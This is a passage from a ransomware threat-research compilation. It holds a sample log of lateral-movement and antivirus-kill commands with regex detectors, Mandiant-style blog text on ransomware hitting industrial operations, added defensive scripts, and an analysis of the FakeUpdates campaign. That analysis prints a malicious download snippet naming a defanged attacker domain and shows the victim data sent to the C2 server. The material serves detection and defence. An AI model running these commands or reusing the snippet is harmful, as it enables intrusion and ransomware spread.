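2020-04-21T02:10:02|JUMP01|CORP\adm_ops|cmd.exe /c start copy windows.bat \\10.1.4.22\c$\windows\temp\
2020-04-21T02:10:05|JUMP01|CORP\adm_ops|wmic /node:"10.1.4.22" /user:"CORP\adm_ops" process call create "cmd.exe /c c:\windows\temp\windows.bat"
2020-04-21T02:10:09|JUMP01|CORP\adm_ops|psexec.exe \\10.1.4.23 -u CORP\adm_ops -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe
2020-04-21T02:10:30|FS07|SYSTEM|taskkill /im vsserv.exe /f
2020-04-21T02:10:30|FS07|SYSTEM|taskkill /im mcinfo.exe /f
2020-04-21T02:10:31|FS07|SYSTEM|taskkill /im crssvc.exe /f
2020-04-21T02:10:32|FS07|SYSTEM|reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2020-04-21T02:10:33|FS07|SYSTEM|netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
2020-04-21T02:11:00|WS113|CORP\jdoe|cmd.exe /c "wmic /node:"10.1.4.40" process call create "regsvr32.exe /i C:\windows\temp\upd.dll""
2020-04-21T09:00:00|WS200|CORP\asmith|regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"
2020-04-21T09:05:00|WS200|CORP\asmith|taskkill /im notepad.exe
"""

# One regex per behaviour seen in the distribution scripts and windows.bat.
RULES = {
    # staging: payload or kill script copied through an admin share into windows\temp
    "copy_to_admin_share_temp": re.compile(
        r"\bcopy\b.*\\\\[\w.-]+\\c\$\\windows\\temp", re.I),
    # remote execution through WMIC against a named node
    "wmic_remote_process_create": re.compile(
        r"\bwmic\b.*/node:.*\bprocess\s+call\s+create\b", re.I),
    # remote execution through PsExec (-accepteula is a useful tell in automation)
    "psexec_remote_exec": re.compile(
        r"\bpsexec(?:\.exe)?\s+\\\\\S+.*-accepteula", re.I),
    # regsvr32 /i loading a payload staged in windows\temp
    "regsvr32_from_temp": re.compile(
        r"\bregsvr32(?:\.exe)?\b.*/i\s+\S*\\windows\\temp\\", re.I),
    # forced process termination, as in the windows.bat kill script
    "taskkill_force": re.compile(r"\btaskkill\b.*/im\s+\S+.*\s/f\b", re.I),
    # RDP enabled through the registry (fDenyTSConnections = 0)
    "rdp_enabled_registry": re.compile(
        r"\breg\s+add\b.*fDenyTSConnections.*/d\s+0\b", re.I),
    # RDP allowed through the host firewall
    "rdp_firewall_rule_enabled": re.compile(
        r"\bnetsh\b.*advfirewall.*group=\W?remote desktop.*enable=", re.I),
    # PowerShell with execution-policy bypass fetching or uploading content
    "powershell_exec_bypass": re.compile(
        r"\bpowershell(?:\.exe)?\b.*-exec(?:utionpolicy)?\s+bypass.*"
        r"(?:DownloadString|UploadFile|ftp://)", re.I),
}


def parse_event(line):
    """Split one log line into its four fields; None for blank or malformed lines."""
    parts = line.strip().split("|", 3)
    if len(parts) != 4:
        return None
    return dict(zip(("ts", "host", "user", "cmdline"), parts))


def match_rules(cmdline):
    """Names of every rule whose pattern matches the command line."""
    return [name for name, pattern in RULES.items() if pattern.search(cmdline)]


def analyze(log_text, kill_burst_threshold=3):
    """Group rule hits per source host and derive incident-level tags.

    distribution     staging copy plus WMIC/PsExec remote execution from one host
                     (the start.bat -> xaa3x.bat pattern); remote_execution or
                     staging when only one half of that pair was seen
    kill_script      a burst of forced taskkills or RDP switched on (windows.bat)
    download_cradle  PowerShell exec-bypass fetching or uploading content
    Returns {host: {"rules": [...], "tags": [...]}} for hosts with any hit."""
    hits = defaultdict(lambda: defaultdict(list))   # host -> rule -> [cmdline]
    for line in log_text.splitlines():
        event = parse_event(line)
        if event is None:
            continue
        for rule in match_rules(event["cmdline"]):
            hits[event["host"]][rule].append(event["cmdline"])

    findings = {}
    for host, rules in hits.items():
        staged = "copy_to_admin_share_temp" in rules
        remote_exec = "wmic_remote_process_create" in rules or "psexec_remote_exec" in rules
        kills = len(rules.get("taskkill_force", []))
        rdp_on = "rdp_enabled_registry" in rules or "rdp_firewall_rule_enabled" in rules
        tags = []
        if staged and remote_exec:
            tags.append("distribution")
        elif remote_exec:
            tags.append("remote_execution")
        elif staged:
            tags.append("staging")
        if kills >= kill_burst_threshold or rdp_on:
            tags.append("kill_script")
        if "powershell_exec_bypass" in rules:
            tags.append("download_cradle")
        findings[host] = {"rules": sorted(rules), "tags": tags}
    return findings


if __name__ == "__main__":
    for host, finding in analyze(SAMPLE_LOG).items():
        print(host, finding["tags"], finding["rules"])
```

The per-host grouping is what separates the distribution pattern from a lone administrative wmic or PsExec call: a single source host that both stages files on admin shares and launches them remotely is the signal, and the benign WS200 events produce no finding at all.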

              Indicators of Compromise

              Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

              Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

              Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

              While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

              Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

              Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

              The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

              In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which expands the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.


              Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

              Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

              • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
              • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
              • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

              Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

              An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

              In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.


              Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

              Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.
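              The kill lists discussed above are usually a batch script of `taskkill` and `net stop` lines, so triaging one means extracting the image names, checking them against the OT software you run, and noticing copy errors such as the "proficyclient.exe4" entry. The following is an added example written for this post, not FireEye/Mandiant code: it parses a constructed kill list, flags entries that match a small OT watch list (only "proficyclient.exe" comes from the post; the other watch-list names are constructed placeholders, not real products), and flags malformed image names that would never match a running process.

```python
"""Triage a ransomware process kill list for OT-related and malformed entries.

Added example (not FireEye/Mandiant code). Parses the `taskkill`-style batch
lines such lists are built from, normalises each image/service name, flags
names that match a watch list of OT process names, and flags image names that
are malformed (e.g. a stray character after ".exe"), the kind of copy error
the post describes in "proficyclient.exe4".
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# `taskkill ... /IM <image> ...` (flags in any order) and `net stop <service>`.
TASKKILL_RE = re.compile(r"taskkill\b.*?/im\s+\"?([^\s\"]+)\"?", re.IGNORECASE)
NET_STOP_RE = re.compile(r"net\s+stop\s+\"?([^\s\"]+)\"?", re.IGNORECASE)
# A well-formed Windows image name for taskkill purposes.
VALID_IMAGE_RE = re.compile(r"^[a-z0-9_.\-]+\.exe$")

# OT-related image names to watch for. "proficyclient.exe" is from the post;
# the other two are CONSTRUCTED placeholders for this example, not real products.
OT_WATCHLIST = {
    "proficyclient.exe",
    "hmi_runtime.exe",      # constructed
    "historian_svc.exe",    # constructed
}

# CONSTRUCTED sample kill list in the style of the batch scripts described.
SAMPLE_KILL_LIST = r"""
@echo off
taskkill /IM sqlservr.exe /F
taskkill /IM proficyclient.exe4 /F
taskkill /F /IM hmi_runtime.exe
net stop "BackupService" /y
taskkill /IM excel.exe /F
"""


@dataclass
class KillListReport:
    total: int = 0
    ot_hits: list[str] = field(default_factory=list)     # OT-related entries
    malformed: list[str] = field(default_factory=list)   # names taskkill can't match


def parse_kill_list(script: str) -> list[tuple[str, str]]:
    """Return ("image"|"service", name) for every termination line, in order."""
    entries = []
    for line in script.splitlines():
        line = line.strip()
        if not line or line.lower().startswith(("rem ", "::", "@echo")):
            continue
        m = TASKKILL_RE.search(line)
        if m:
            entries.append(("image", m.group(1).lower()))
            continue
        m = NET_STOP_RE.search(line)
        if m:
            entries.append(("service", m.group(1).lower()))
    return entries


def triage(script: str) -> KillListReport:
    """Summarise how much of the list is OT-related and which entries are broken."""
    report = KillListReport()
    for kind, name in parse_kill_list(script):
        report.total += 1
        if kind != "image":
            continue
        if not VALID_IMAGE_RE.match(name):
            report.malformed.append(name)
        # Normalise trailing junk so a typo'd entry like "proficyclient.exe4"
        # is still recognised as an attempt to target an OT process.
        base = name.split(".exe", 1)[0] + ".exe" if ".exe" in name else name
        if base in OT_WATCHLIST:
            report.ot_hits.append(name)
    return report


if __name__ == "__main__":
    r = triage(SAMPLE_KILL_LIST)
    print(f"{r.total} entries, OT-related: {r.ot_hits}, malformed: {r.malformed}")
```

Run against the constructed sample, the report counts five entries, lists both "proficyclient.exe4" and "hmi_runtime.exe" as OT-related, and flags "proficyclient.exe4" as malformed. In practice the watch list should be generated from your own asset inventory of OT vendor software, and the malformed entries are worth recording: they are a stable artifact for linking a sample to the list it was copied from.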

              Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

              As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

              The best-known example of ransomware impacting industrial production due to an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these flows of information, containing for example product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection happened only on corporate networks, the biggest business impact was caused by disruptions of Oracle ERP software, driving the company temporarily offline and negatively affecting production.

              Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

              As recently as February 2020, the Cybersecurity and Infrastructure Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shutdown of operations that lasted two days.

              Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

              Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

              For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

              • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
              • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
              • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
              • When establishing a rigorous back-up program, special attention should be paid to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
              • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
              • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
              • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
              • Note that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructure. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.
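              The segmentation and hardening recommendations above come down to a checkable property: the protocols ransomware uses to spread (SMB, RDP, WMI) must not be allowed from less trusted zones into the OT zone or toward backup infrastructure. The following is an added example written for this post, not FireEye/Mandiant code: it audits a simplified, zone-based rule set (the rule format and zone names are constructed for this example, not any vendor's syntax) and shows a weak rule set beside a corrected one in which backups are pulled from a segregated zone rather than pushed to it.

```python
"""Audit a zone-based firewall rule set for ransomware propagation paths.

Added example (not FireEye/Mandiant code). The rule model and zone names are
CONSTRUCTED for illustration. A finding is raised for any "allow" rule that
permits SMB, RDP or WMI/RPC, or any port, from a less trusted zone into a more
trusted one (OT or backup). Rules are evaluated independently; real firewalls
apply first-match ordering, which this simplified model does not reproduce.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Union

# Ports the post names as typical propagation vectors.
PROPAGATION_PORTS = {445: "SMB", 3389: "RDP", 135: "WMI/RPC endpoint mapper"}

# Higher rank = more sensitive. Flows are only audited when they move "up".
ZONE_RANK = {"internet": 0, "corporate": 1, "dmz": 2, "ot": 3, "backup": 3}


@dataclass(frozen=True)
class Rule:
    src_zone: str
    dst_zone: str
    port: Union[int, str]   # TCP port or "any"
    action: str             # "allow" or "deny"


@dataclass(frozen=True)
class Finding:
    rule: Rule
    reason: str


def audit(rules: list[Rule]) -> list[Finding]:
    """Return one finding per allow rule that opens a propagation path upward."""
    findings: list[Finding] = []
    for r in rules:
        if r.action != "allow":
            continue
        if ZONE_RANK[r.dst_zone] <= ZONE_RANK[r.src_zone]:
            continue  # lateral or downward flow: out of scope for this check
        if r.port == "any":
            findings.append(Finding(r, f"allow-any from {r.src_zone} into {r.dst_zone}"))
        elif r.port in PROPAGATION_PORTS:
            proto = PROPAGATION_PORTS[r.port]
            findings.append(Finding(r, f"{proto} allowed from {r.src_zone} into {r.dst_zone}"))
    return findings


# CONSTRUCTED weak rule set: flat reachability from corporate into OT and backup.
WEAK_RULES = [
    Rule("internet", "dmz", 443, "allow"),
    Rule("corporate", "ot", 445, "allow"),        # OT file shares reachable via SMB
    Rule("corporate", "ot", 3389, "allow"),       # direct RDP onto HMIs
    Rule("corporate", "backup", "any", "allow"),  # backup server fully exposed
    Rule("ot", "corporate", 8443, "allow"),       # historian export, outbound only
]

# CONSTRUCTED hardened rule set: explicit denies, no propagation ports upward,
# and the backup zone pulls from corporate instead of being pushed to.
HARDENED_RULES = [
    Rule("internet", "dmz", 443, "allow"),
    Rule("corporate", "ot", "any", "deny"),
    Rule("corporate", "backup", "any", "deny"),
    Rule("backup", "corporate", 445, "allow"),    # backup server initiates the pull
    Rule("ot", "corporate", 8443, "allow"),
]


if __name__ == "__main__":
    for label, rules in (("weak", WEAK_RULES), ("hardened", HARDENED_RULES)):
        print(f"{label}: {len(audit(rules))} finding(s)")
        for f in audit(rules):
            print("  -", f.reason)
```

The weak set produces three findings (SMB and RDP into OT, allow-any into backup); the hardened set produces none, because the only SMB rule originates from the backup zone. The same check can be fed from an exported rule base once its zones are mapped onto the rank table, and the rank table is where the organization-specific judgement from the last bullet lives: a site that cannot afford a hardware boundary can still enforce the same property with host-based firewall rules on the OT and backup hosts.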

              Head Fake: Tackling Disruptive Ransomware Attacks

              Within the past several months, FireEye has observed financially-motivated threat actors employ tactics that focus on disrupting business processes by deploying ransomware en masse throughout a victim’s environment. Understanding that normal business processes are critical to organizational success, these ransomware campaigns have been accompanied by multi-million dollar ransom demands. In this post, we’ll provide a technical examination of one recent campaign that stems from a technique we initially reported on in April 2018.

              Between May and September 2019, FireEye responded to multiple incidents involving a financially-motivated threat actor who leveraged compromised web infrastructure to establish an initial foothold in victim environments. This activity bore similarities to a fake browser update campaign first identified in April 2018, now tracked by FireEye as FakeUpdates. In this newer campaign, the threat actors leveraged victim systems to deploy malware such as Dridex or NetSupport, along with multiple post-exploitation frameworks. The threat actors’ ultimate goal in some cases was to ransom systems en masse with BitPaymer or DoppelPaymer ransomware (see Figure 1).


              Figure 1: Recent FakeUpdates infection chain

              Due to campaign proliferation, we have responded to this activity at both Mandiant Managed Defense customers and incident response investigations performed by Mandiant. Through Managed Defense network and host monitoring as well as Mandiant’s incident response findings, we observed the routes the threat actor took, the extent of the breaches, and exposure of their various toolkits.

              Knock, Knock: FakeUpdates are Back!

              In April 2018, FireEye identified a campaign that used compromised websites to deliver heavily obfuscated Trojan droppers masquerading as Chrome, Internet Explorer, Opera, and/or Firefox browser updates. The compromised sites contained malicious code injected either directly into the HTML or into JavaScript components rendered by the pages. Victim users reached these sites either via HTTP redirects or through watering-hole techniques employed by the attackers.

              Since our April 2018 blog post, this campaign has been refined to include new techniques and the use of post-exploitation toolkits. Recent investigations have shown threat actor activity that included internal reconnaissance, credential harvesting, privilege escalation, lateral movement, and ransomware deployment in enterprise networks. FireEye has identified that a large number of the compromised sites serving up the first stage of FakeUpdates have been older, vulnerable Content Management System (CMS) applications.

              You Are Using an Older Version…of our Malware

              The FakeUpdates campaign begins with a rather intricate sequence of browser validation, performed before the final payload is downloaded. Injected code on the initial compromised page makes the user’s browser transparently navigate to a malicious website using hard-coded parameters. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update. FireEye has observed that the browser validation sequence may include additional protections to evade sandbox detection and post-incident triage attempts on the compromised site(s).


              Figure 2: Example of FakeUpdate landing page after HTTP redirects

              The redirect process used numerous subdomains, with a limited number of IP addresses. The malicious subdomains are often changed in different parts of the initial redirects and browser validation stages.

              After clicking the ‘Update’ button, we observed the downloading of one of three types of files:

              • Heavily-obfuscated HTML applications (.hta file extensions)
              • JavaScript files (.js file extensions)
              • ZIP-compressed JavaScript files (.zip extensions)

              Figure 3 provides a snippet of JavaScript that provides the initial download functionality.

              var domain = '//gnf6.ruscacademy[.]in/';
              var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
              var statTypeParamName = 'st';

              var filename = 'download.hta';
              var browser = 'Chrome';
              var special = '1';   
              var filePlain = window.atob(file64);
              var a = document.getElementById('buttonDownload');

              Figure 3: Excerpts of JavaScript code identified from the FakeUpdates landing pages

              When the user opens the initial FakeUpdates downloader, the Windows Scripting Host (wscript.exe) is executed and the following actions are performed:

              1. A script is executed in memory and used to fingerprint the affected system.
              2. A subsequent backdoor or banking trojan is downloaded if the system is successfully fingerprinted.
              3. A script is executed in memory which:
                • Downloads and launches a third party screenshot utility.
                • Sends the captured screenshots to an attacker.
              4. The payload delivered in step 2 is subsequently executed by the script process.

              The backdoor and banking-trojan payloads described above have been identified as Dridex, NetSupport Manager RAT, AZORult, and Chthonic malware. The strategy behind the selective payload delivery is unclear; however, the most prevalent malware delivered during this phase of the infection chain were variants of the Dridex backdoor.

              FakeUpdates: More like FakeHTTP

              After the end user executes the FakeUpdates download, the victim system will send a custom HTTP POST request to a hard-coded Command and Control (C2) server. The POST request, depicted in Figure 4, showed that the threat actors used a custom HTTP request for initial callback. The Age HTTP header, for example, was set to a string of 16 seemingly-random lowercase hexadecimal characters.


              Figure 4: Initial HTTP communication after successful execution of the FakeUpdates dropper

              The HTTP Age header typically represents the time in seconds since an object was cached by a proxy. In this case, via analysis of the obfuscated code on disk, FireEye identified that the Age header correlates to a scripted “auth header” parameter, likely used by the C2 server to validate the request. The first HTTP POST request also contains an XOR-encoded HTTP payload variable “a=”.
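              The misuse of the Age header is a cheap network detection opportunity: Age is defined as a non-negative integer count of seconds and as a response header, so a client POST carrying a 16-character hexadecimal Age value is doubly anomalous. The following is an added example (not code from the original post or from FireEye) that parses raw HTTP requests and flags that pattern, together with the single opaque “a=” body parameter described above. The sample requests, the hostnames (reserved .invalid TLD), the hex token and the body are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# RFC 7234 defines Age as delta-seconds (digits only) and only as a response header.
# The FakeUpdates first-stage callback instead sends a 16-character lowercase hex
# token in the Age header of a client POST request.
AGE_DELTA_SECONDS_RE = re.compile(r"^[0-9]+$")
AGE_HEX_TOKEN_RE = re.compile(r"^[0-9a-f]{16}$")


def parse_http_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP request into method, path, lowercase-keyed headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, _, rest = lines[0].partition(" ")
    path = rest.split(" ")[0] if rest else ""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def classify_age(value: Optional[str]) -> str:
    """Label an Age value: absent, delta-seconds (as specified), hex-token, or malformed."""
    if value is None:
        return "absent"
    if AGE_DELTA_SECONDS_RE.match(value):
        return "delta-seconds"
    if AGE_HEX_TOKEN_RE.match(value):
        return "hex-token"
    return "malformed"


def inspect_request(raw: str) -> Dict[str, object]:
    """Return the anomaly findings for one request."""
    req = parse_http_request(raw)
    age_class = classify_age(req["headers"].get("age"))
    findings: List[str] = []
    if age_class == "hex-token":
        findings.append("age-header-hex-token")
    elif age_class == "malformed":
        findings.append("age-header-malformed")
    elif age_class == "delta-seconds":
        # Even a well-formed Age is odd in a request: it is a response header.
        findings.append("age-header-in-request")
    if req["method"] == "POST" and str(req["body"]).startswith("a="):
        findings.append("single-opaque-param-a")
    return {"method": req["method"], "path": req["path"], "age": age_class, "findings": findings}


def scan_requests(raw_requests: List[str]) -> List[Dict[str, object]]:
    """Return inspections of requests that look like the FakeUpdates callback."""
    return [r for r in (inspect_request(raw) for raw in raw_requests)
            if "age-header-hex-token" in r["findings"]]


# Constructed sample traffic (not captured data).
SAMPLE_REQUESTS = [
    "POST /wordpress/news.php HTTP/1.1\r\n"
    "Host: c2.example.invalid\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Age: 3f9a1c7e0b2d4a6f\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "a=1a2b3c4d5e6f",
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.invalid\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n",
    "POST /api/login HTTP/1.1\r\n"
    "Host: app.example.invalid\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"user": "alice"}',
]

if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(hit)
```

              In a real deployment the same classification would run on proxy or IDS header logs rather than raw requests; the important design point is that the match is anchored (exactly 16 lowercase hex characters), so legitimate caches that emit numeric Age values on responses never trip it.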

              The C2 server responds to the initial HTTP request with encoded JavaScript. When the code is decoded and subsequently executed, system and user information is collected using wscript.exe. The information collected from the victim system included:

              • The malicious script that initialized the callback
              • System hostname
              • Current user account
              • Active Directory domain
              • Hardware details, such as manufacturer
              • Anti-virus software details
              • Running processes

              This activity is nearly identical to the steps observed in our April 2018 post, indicating only minor changes in data collection during this stage. For example, in the earlier iteration of this campaign, we did not observe the collection of the script responsible for the C2 communication. Following the system information gathering, the data is XOR-encoded and sent via another custom HTTP POST request to the same C2 server, with the data included in the parameter “b=”. Figure 5 provides a sample snippet of the second HTTP request.


              Figure 5: Second HTTP POST request after successful system information gathering

              Figure 6 provides a copy of the decoded content, showing the various data points the malware transmitted back to the C2 server.

              0=500
              1=C:\Users\User\AppData\Local\Temp\Chrome.js
              2=AMD64
              3=SYSTEM1
              4=User
              5=4
              6=Windows_NT
              7=DOMAIN
              8=HP
              9=HP EliteDesk
              10=BIOS_VERSION
              11=Windows Defender|Vendor Anti-Virus
              12=Vendor Anti-Virus|Windows Defender|
              13=00:00:00:00:00:00
              14=Enhanced (101- or 102-key)
              15=USB Input Device
              16=1024x768
              17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe| winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|
              svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe…

              Figure 6: Decoded system information gathered by the FakeUpdates malware

              After receiving the system information, the C2 server responds with an encoded payload delivered via chunked transfer-encoding to the infected system. This technique evades conventional IDS/IPS appliances, allowing for the second-stage payload to successfully download. During our investigations and FireEye Intelligence’s monitoring, we recovered encoded payloads that delivered one of the following:

              • Dridex (Figure 7)
